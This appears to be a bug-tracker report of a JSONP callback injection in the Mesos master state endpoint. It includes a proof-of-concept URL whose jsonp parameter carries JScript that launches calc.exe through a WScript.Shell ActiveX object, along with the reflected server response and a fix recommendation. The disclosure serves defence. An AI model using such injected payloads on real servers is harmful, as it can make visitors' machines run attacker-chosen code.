Details
Description
It is possible to inject arbitrary content into a server request. Take into account the following url: https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
This will result in the following request:
GET /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b HTTP/1.1 Host: xxx.xxx.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: */* Accept-Language: en-US,en;q=0.5 [...SNIP...]
The server response:
HTTP/1.1 200 OK Server: openresty/1.9.15.1 Date: Tue, 25 Jul 2017 09:04:31 GMT Content-Type: text/javascript Content-Length: 1411637 Connection: close var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01 19:16:40","build_time":149634 [...SNIP...]
On Internet Explorer this will trigger a file download, and when executing the file (state.js), it will pop-up a calculator. It's my recommendation to apply input validation on this parameter, to prevent abuse.
Attachments
Issue Links
- is related to
-
MESOS-5918 Replace jsonp with a more secure alternative
- Open
-
MESOS-3796 Mesos Master and Agent http api should support configurable CORS headers
- Open